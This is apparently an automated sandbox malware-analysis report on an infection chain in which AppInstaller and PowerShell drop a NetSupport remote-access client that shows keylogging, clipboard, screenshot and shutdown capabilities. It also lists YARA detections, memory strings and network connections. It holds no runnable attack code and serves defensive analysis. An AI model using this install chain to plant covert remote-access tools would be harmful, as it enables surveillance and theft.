Source: AppInstallerFullTrustAppServiceClient.exe, 00000012.00000002.1677556637.000002B5AB27A000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2594809898.000002A99F399000.00000004.00000020.00020000.00000000.sdmp, AppInstallerFullTrustAppServiceClient.exe, 00000026.00000002.2102011848.00000177F3C7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/
Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.anf.es/AC/ACTAS/789230
Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.anf.es/address/)1(0&
Source: AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.catcert.net/verarrel
Source: AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.catcert.net/verarrel05
Source: AppInstaller.exe, 0000000E.00000002.1767669813.00000196D5373000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51F1000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5344000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1681976342.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767561183.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.00000231633D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2521327476.000002A997C6F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2605920830.000002A99F543000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2589315974.000002A99F31F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E9000.00000004.00000020.00020000.00000000.sdmp, remcmdstub.exe.26.dr, APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp.14.dr, APPX.u5y27yz6k3vi25fmvsudde2mb.tmp.14.dr, TCCTL32.DLL.26.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr	String found in binary or memory: https://www.globalsign.com/repository/03
Source: powershell.exe, 0000001A.00000002.1968531120.00000231633D6000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.26.dr	String found in binary or memory: https://www.globalsign.com/repository/06
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.netlock.net/docs
Source: powershell.exe, 00000019.00000002.1941634656.000002B280472000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2062772287.000002B2F5E82000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1941634656.000002B2801BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2058406283.000002B2F5C65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.wsj.com/
Source: powershell.exe, 00000019.00000002.2058406283.000002B2F5C65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.wsj.com/vice
Source: powershell.exe, 00000019.00000002.1941634656.000002B280472000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.wsj.com/x
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/0m

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.28.14:443 -> 192.168.2.17:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.21.200:443 -> 192.168.2.17:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.133.88.190:443 -> 192.168.2.17:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.104.72.157:443 -> 192.168.2.17:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.133.88.190:443 -> 192.168.2.17:49807 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_1101F350 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,

32_2_1101F350

Contains functionality to modify clipboard data

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1101F350 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,		32_2_1101F350
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11032870 GetClipboardFormatNameA,SetClipboardData,		32_2_11032870

Contains functionality to read the clipboard data

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_11031B70 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,

32_2_11031B70

Contains functionality to record screenshots

Source: C:\ProgramData\netsupport\client\client32.exe

32_2_110076F0

Potential key logger detected (key state polling based)

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_11110930 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,

32_2_11110930

Yara detected Keylogger Generic

Source: Yara match	File source: 32.2.client32.exe.111b32a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: client32.exe PID: 7408, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\netsupport\client\PCICL32.DLL, type: DROPPED

Drops certificate files (DER)

Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe

File created: C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\Temp\APPX.u5y27yz6k3vi25fmvsudde2mb.tmp

Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\ProgramData\netsupport\client\client32.exe

32_2_11112960

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_7788.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2564, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7788, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\PCICHEK.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\AudioCapture.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\client32.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\pcicapi.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\PCICL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\HTCTL32.DLL	Jump to dropped file

Contains functionality to communicate with device drivers

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_110A9020: DeviceIoControl,

32_2_110A9020

Contains functionality to launch a process as a different user

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_1115A250 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,

32_2_1115A250

Contains functionality to shutdown / reboot the system

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1102D1B3 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		32_2_1102D1B3
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1102CE84 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		32_2_1102CE84

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BAF41B8E	23_2_00007FF9BAF41B8E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BAF311D8	23_2_00007FF9BAF311D8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BAF3449D	23_2_00007FF9BAF3449D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BAF45783	23_2_00007FF9BAF45783
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CE7A9	23_2_00007FF9BB3CE7A9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CCC3B	23_2_00007FF9BB3CCC3B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C9C9D	23_2_00007FF9BB3C9C9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C449D	23_2_00007FF9BB3C449D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3B1CAD	23_2_00007FF9BB3B1CAD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CACCE	23_2_00007FF9BB3CACCE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C7C6D	23_2_00007FF9BB3C7C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3BB32D	23_2_00007FF9BB3BB32D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C5B2D	23_2_00007FF9BB3C5B2D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CC33D	23_2_00007FF9BB3CC33D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3B5B51	23_2_00007FF9BB3B5B51
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C6B0D	23_2_00007FF9BB3C6B0D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C63A4	23_2_00007FF9BB3C63A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CBB65	23_2_00007FF9BB3CBB65
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CA35D	23_2_00007FF9BB3CA35D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3BC389	23_2_00007FF9BB3BC389
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CB1FD	23_2_00007FF9BB3CB1FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C7A14	23_2_00007FF9BB3C7A14
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C72CB	23_2_00007FF9BB3C72CB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CAACB	23_2_00007FF9BB3CAACB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C726D	23_2_00007FF9BB3C726D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C628B	23_2_00007FF9BB3C628B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3B111D	23_2_00007FF9BB3B111D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C814D	23_2_00007FF9BB3C814D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C594D	23_2_00007FF9BB3C594D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C68ED	23_2_00007FF9BB3C68ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C78FB	23_2_00007FF9BB3C78FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3B98FD	23_2_00007FF9BB3B98FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C519B	23_2_00007FF9BB3C519B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3B81CD	23_2_00007FF9BB3B81CD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C996D	23_2_00007FF9BB3C996D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CC01D	23_2_00007FF9BB3CC01D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C47DB	23_2_00007FF9BB3C47DB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C9FFD	23_2_00007FF9BB3C9FFD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3B000A	23_2_00007FF9BB3B000A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CB86D	23_2_00007FF9BB3CB86D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C708E	23_2_00007FF9BB3C708E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3B6F3D	23_2_00007FF9BB3B6F3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CDF10	23_2_00007FF9BB3CDF10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CC7AD	23_2_00007FF9BB3CC7AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C6FAB	23_2_00007FF9BB3C6FAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C5FAD	23_2_00007FF9BB3C5FAD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C2776	23_2_00007FF9BB3C2776
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3B3F6D	23_2_00007FF9BB3B3F6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CA77D	23_2_00007FF9BB3CA77D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CB61D	23_2_00007FF9BB3CB61D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3B763D	23_2_00007FF9BB3B763D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CA5DD	23_2_00007FF9BB3CA5DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3B2DFD	23_2_00007FF9BB3B2DFD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C660B	23_2_00007FF9BB3C660B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CA52D	23_2_00007FF9BB3CA52D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3C6D2D	23_2_00007FF9BB3C6D2D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB3CBD48	23_2_00007FF9BB3CBD48
